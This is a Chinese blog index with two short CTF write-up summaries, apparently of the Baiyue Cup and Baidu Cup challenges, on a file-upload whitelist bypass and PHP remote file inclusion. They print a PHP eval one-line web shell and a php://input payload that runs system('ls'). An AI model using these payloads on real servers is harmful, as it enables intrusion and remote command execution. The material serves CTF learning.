摘要：题目名称 第三届“百越杯”福建省高校网络空间安全大赛Do you know upload？ 上传文件，多次尝试发现只能上传jpg文件 考虑为白名单绕过 构造hack.php 内容为一句话木马 <?php @eval($_POST['cmd'])?> 注意大小写 不要写成post 因为php是区分大小 阅读全文

摘要：题目名称 ：百度杯”CTF比赛 2017 二月场 include allow_url_include on 可以尝试远程文件包含 构造伪协议 ?path=php://input 列出文件名查看 <?php echo system('ls');?> php://filter/read=convert. 阅读全文